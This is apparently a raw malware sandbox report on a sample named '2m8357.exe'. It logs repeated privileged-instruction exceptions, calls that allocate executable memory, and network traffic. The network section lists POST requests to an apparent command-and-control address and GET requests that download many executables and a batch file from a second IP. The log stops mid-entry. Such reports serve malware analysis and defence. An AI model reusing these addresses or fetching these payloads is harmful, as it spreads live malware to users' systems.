exception.symbol: 2m8357+0x20bb81
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2145153
exception.address: 0x114bb81
registers.esp: 3800404
registers.edi: 4023944992
registers.eax: 28209
registers.ebp: 4006408212
registers.edx: 311541953
registers.ebx: 18161512
registers.esi: 1989380932
registers.ecx: 329673588
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 e9 de 00 00 00 01 44 24 04 58 59 81 c1 04
exception.symbol: 2m8357+0x20b5e5
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2143717
exception.address: 0x114b5e5
registers.esp: 3800404
registers.edi: 4023944992
registers.eax: 28209
registers.ebp: 4006408212
registers.edx: 4294941836
registers.ebx: 18161512
registers.esi: 1989380932
registers.ecx: 1179202795
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 c7 04 24 25 58 9e 4f 81 24 24 e0 2a fd 7f
exception.symbol: 2m8357+0x20c6a1
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2148001
exception.address: 0x114c6a1
registers.esp: 3800404
registers.edi: 4023944992
registers.eax: 18168505
registers.ebp: 4006408212
registers.edx: 1476736768
registers.ebx: 2146231623
registers.esi: 1989380932
registers.ecx: 34175232
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 6c 09 00 00 87 04 24 5c 89 0c 24 e9 bf 02
exception.symbol: 2m8357+0x20c55d
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2147677
exception.address: 0x114c55d
registers.esp: 3800404
registers.edi: 4023944992
registers.eax: 18141349
registers.ebp: 4006408212
registers.edx: 226281
registers.ebx: 2146231623
registers.esi: 0
registers.ecx: 34175232
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 23 03 00 00 81 2c 24 f7 bd df 77 81 04 24
exception.symbol: 2m8357+0x210276
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2163318
exception.address: 0x1150276
registers.esp: 3800400
registers.edi: 4023944992
registers.eax: 27082
registers.ebp: 4006408212
registers.edx: 226281
registers.ebx: 305244883
registers.esi: 18151971
registers.ecx: 226281
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 c7 04 24 46 a3 7e 0e 81 2c 24 68 f3 80 90
exception.symbol: 2m8357+0x20feb7
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2162359
exception.address: 0x114feb7
registers.esp: 3800404
registers.edi: 4023944992
registers.eax: 27082
registers.ebp: 4006408212
registers.edx: 226281
registers.ebx: 305244883
registers.esi: 18179053
registers.ecx: 226281
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 e9 83 03 00 00 81 04 24 91 70 ff 59 5f 81
exception.symbol: 2m8357+0x20fb86
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2161542
exception.address: 0x114fb86
registers.esp: 3800404
registers.edi: 4023944992
registers.eax: 27082
registers.ebp: 4006408212
registers.edx: 0
registers.ebx: 562233704
registers.esi: 18155297
registers.ecx: 226281
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 57 bf 1d bd 0f 3f 89 f8 5f 29 c6 58 81 ee
exception.symbol: 2m8357+0x22ec30
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2288688
exception.address: 0x116ec30
registers.esp: 3800368
registers.edi: 1202233320
registers.eax: 28637
registers.ebp: 4006408212
registers.edx: 2130566132
registers.ebx: 1229125602
registers.esi: 18276416
registers.ecx: 1568800768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 45 21 d5 70 e9 d9 02 00 00 52 50 b8 04 00
exception.symbol: 2m8357+0x22e85e
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2287710
exception.address: 0x116e85e
registers.esp: 3800372
registers.edi: 1202233320
registers.eax: 0
registers.ebp: 4006408212
registers.edx: 116969
registers.ebx: 1229125602
registers.esi: 18279581
registers.ecx: 1568800768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 b9 04 cc bb 66 e9 1d fc ff ff 89 fe 5f 81
exception.symbol: 2m8357+0x2300f5
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2294005
exception.address: 0x11700f5
registers.esp: 3800368
registers.edi: 1202233320
registers.eax: 25625
registers.ebp: 4006408212
registers.edx: 116969
registers.ebx: 18282871
registers.esi: 18279581
registers.ecx: 85230820
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 89 04 24 56 e9 00 00 00 00 57 bf 37 8e 1d
exception.symbol: 2m8357+0x230353
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2294611
exception.address: 0x1170353
registers.esp: 3800372
registers.edi: 604292945
registers.eax: 4294944280
registers.ebp: 4006408212
registers.edx: 116969
registers.ebx: 18308496
registers.esi: 18279581
registers.ecx: 85230820
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 c7 04 24 3a 49 c5 5a 89 04 24 68 80 7a ac
exception.symbol: 2m8357+0x230f52
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2297682
exception.address: 0x1170f52
registers.esp: 3800372
registers.edi: 604292945
registers.eax: 322689
registers.ebp: 4006408212
registers.edx: 18314148
registers.ebx: 18308496
registers.esi: 4294941696
registers.ecx: 85230820
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 eb fc ff ff 9f 7c d1 be 3f 93 e7 9d 41 e4
exception.symbol: 2m8357+0x231c4f
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2301007
exception.address: 0x1171c4f
registers.esp: 3800368
registers.edi: 18288848
registers.eax: 25961
registers.ebp: 4006408212
registers.edx: 1279364371
registers.ebx: 1711171134
registers.esi: 4294941696
registers.ecx: 2028334290
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 96 fa ff ff 29 d0 5a 01 c6 58 81 c6 04 00
exception.symbol: 2m8357+0x231818
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2299928
exception.address: 0x1171818
registers.esp: 3800372
registers.edi: 18291793
registers.eax: 25961
registers.ebp: 4006408212
registers.edx: 1279364371
registers.ebx: 0
registers.esi: 846176
registers.ecx: 2028334290
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 eb 94 4d fb 0d e9 0e f4 ff ff 89 1c 24 bb
exception.symbol: 2m8357+0x23646f
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2319471
exception.address: 0x117646f
registers.esp: 3800368
registers.edi: 18292694
registers.eax: 30975
registers.ebp: 4006408212
registers.edx: 0
registers.ebx: 18306890
registers.esi: 18291822
registers.ecx: 1969225870
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 c7 04 24 46 c6 3d 33 89 34 24 68 22 6f e7
exception.symbol: 2m8357+0x2362fd
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2319101
exception.address: 0x11762fd
registers.esp: 3800372
registers.edi: 18292694
registers.eax: 4294939788
registers.ebp: 4006408212
registers.edx: 0
registers.ebx: 18337865
registers.esi: 18291822
registers.ecx: 966368653
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 12 09 00 00 33 04 24 e9 84 0a 00 00 87 3c
exception.symbol: 2m8357+0x2368f8
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2320632
exception.address: 0x11768f8
registers.esp: 3800368
registers.edi: 18292694
registers.eax: 26612
registers.ebp: 4006408212
registers.edx: 1004011514
registers.ebx: 16394669
registers.esi: 18311099
registers.ecx: 966368653
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 34 24 e9 15 03 00 00 89 e2 55 e9
exception.symbol: 2m8357+0x236d04
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2321668
exception.address: 0x1176d04
registers.esp: 3800372
registers.edi: 18292694
registers.eax: 24811
registers.ebp: 4006408212
registers.edx: 0
registers.ebx: 16394669
registers.esi: 18314391
registers.ecx: 966368653
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 e9 9f 01 00 00 8b 1c 24 51 89 e1 81 c1 04
exception.symbol: 2m8357+0x240b6f
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2362223
exception.address: 0x1180b6f
registers.esp: 3800368
registers.edi: 18406005
registers.eax: 26434
registers.ebp: 4006408212
registers.edx: 948097505
registers.ebx: 4063615605
registers.esi: 18351751
registers.ecx: 4063615605
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb b8 bc ac fd 1b 55 e9 92 02 00 00 81 c4 04 00
exception.symbol: 2m8357+0x240a21
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2361889
exception.address: 0x1180a21
registers.esp: 3800372
registers.edi: 0
registers.eax: 26434
registers.ebp: 4006408212
registers.edx: 948097505
registers.ebx: 81129
registers.esi: 18354869
registers.ecx: 4063615605
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 be 00 00 00 89 34 24 89 e6 e9 aa 01 00 00
exception.symbol: 2m8357+0x24247b
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2368635
exception.address: 0x118247b
registers.esp: 3800368
registers.edi: 0
registers.eax: 18356902
registers.ebp: 4006408212
registers.edx: 948097505
registers.ebx: 81129
registers.esi: 18354869
registers.ecx: 143972650
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 99 08 00 00 68 cd 1c d1 19 89 1c 24 e9 37
exception.symbol: 2m8357+0x241cbd
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2366653
exception.address: 0x1181cbd
registers.esp: 3800372
registers.edi: 0
registers.eax: 18389049
registers.ebp: 4006408212
registers.edx: 5892432
registers.ebx: 4294938312
registers.esi: 18354869
registers.ecx: 143972650
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 31 00 00 00 89 e1 81 c1 04 00 00 00 83 c1
exception.symbol: 2m8357+0x24803c
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2392124
exception.address: 0x118803c
registers.esp: 3800372
registers.edi: 0
registers.eax: 32268
registers.ebp: 4006408212
registers.edx: 2130566132
registers.ebx: 2147483650
registers.esi: 18412221
registers.ecx: 1568800768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 66 04 00 00 81 cf c8 c2 bb 6f 81 c7 24 61
exception.symbol: 2m8357+0x2476b0
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2389680
exception.address: 0x11876b0
registers.esp: 3800372
registers.edi: 0
registers.eax: 32268
registers.ebp: 4006408212
registers.edx: 2130566132
registers.ebx: 2147483650
registers.esi: 18383305
registers.ecx: 604292946
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 e4 04 00 00 35 c0 fe 2f 83 31 c1 8b 04 24
exception.symbol: 2m8357+0x2581ea
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2458090
exception.address: 0x11981ea
registers.esp: 3800372
registers.edi: 18424919
registers.eax: 3434960208
registers.ebp: 4006408212
registers.edx: 0
registers.ebx: 18450730
registers.esi: 18424883
registers.ecx: 1568800768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 28 08 52 4f e9 5b 00 00 00 50 e9 bd 01 00
exception.symbol: 2m8357+0x264349
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2507593
exception.address: 0x11a4349
registers.esp: 3800368
registers.edi: 18476292
registers.eax: 27805
registers.ebp: 4006408212
registers.edx: 1170440
registers.ebx: 18450730
registers.esi: 18424883
registers.ecx: 18496350
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 09 00 00 00 54 8f 04 24 e9 4c 00 00 00 68
exception.symbol: 2m8357+0x264438
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2507832
exception.address: 0x11a4438
registers.esp: 3800372
registers.edi: 18476292
registers.eax: 27805
registers.ebp: 4006408212
registers.edx: 3812597352
registers.ebx: 18450730
registers.esi: 0
registers.ecx: 18499227
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 e9 df f7 ff ff 56 c7 04 24 38 c8 55 1c 89
exception.symbol: 2m8357+0x2666f1
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2516721
exception.address: 0x11a66f1
registers.esp: 3800372
registers.edi: 4023721232
registers.eax: 384989288
registers.ebp: 4006408212
registers.edx: 0
registers.ebx: 4024393721
registers.esi: 18508246
registers.ecx: 734272745
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 2d fa ff ff 51 89 1c 24 bb 04 00 00 00 e9
exception.symbol: 2m8357+0x27c4f8
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2606328
exception.address: 0x11bc4f8
registers.esp: 3800372
registers.edi: 18622895
registers.eax: 4294942084
registers.ebp: 4006408212
registers.edx: 1440975187
registers.ebx: 899415641
registers.esi: 891985476
registers.ecx: 18592849
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 68 cb c0 7d 07 e9 53 00 00 00 c7 04 24 07
exception.symbol: 2m8357+0x2855eb
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2643435
exception.address: 0x11c55eb
registers.esp: 3800372
registers.edi: 18622895
registers.eax: 322689
registers.ebp: 4006408212
registers.edx: 18658586
registers.ebx: 4294944044
registers.esi: 2005598220
registers.ecx: 1568800768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 e9 d1 01 00 00 89 0c 24 54 ff 34 24 59 83
exception.symbol: 2m8357+0x28e85c
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2680924
exception.address: 0x11ce85c
registers.esp: 3800368
registers.edi: 18310506
registers.eax: 26843
registers.ebp: 4006408212
registers.edx: 18670326
registers.ebx: 16910336
registers.esi: 18310505
registers.ecx: 3738837507
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.59/Dy5h4kus/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/fate/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/7453936223/LAc2heq.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/5561582465/235T1TS.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6691015685/xztOH3r.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/ebash/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/7881515133/690BRuM.bat
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6350437481/lBiQciH.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/5308024245/pOqYWAZ.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/7709196889/hvof1h0.exe
request POST http://185.215.113.59/Dy5h4kus/index.php
request GET http://185.215.113.41/files/fate/random.exe
request GET http://185.215.113.41/files/7453936223/LAc2heq.exe
request GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
request GET http://185.215.113.41/files/5561582465/235T1TS.exe
request GET http://185.215.113.41/files/6691015685/xztOH3r.exe
request GET http://185.215.113.41/files/ebash/random.exe
request GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
request GET http://185.215.113.41/files/7881515133/690BRuM.bat
request GET http://185.215.113.41/files/6350437481/lBiQciH.exe
request GET http://185.215.113.41/files/5308024245/pOqYWAZ.exe
request GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
request GET http://185.215.113.41/files/7709196889/hvof1h0.exe
request POST http://185.215.113.59/Dy5h4kus/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73dc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d21000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01080000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006850000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2320
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7793f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2320
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x778b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2320
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 180224
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f41000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04630000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04640000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04680000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2320
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04690000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00440000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2980
region_size: 401408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7793f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x778b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75ab1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73211000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 413696
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cf0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04da0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04db0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04dc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04dd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04de0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
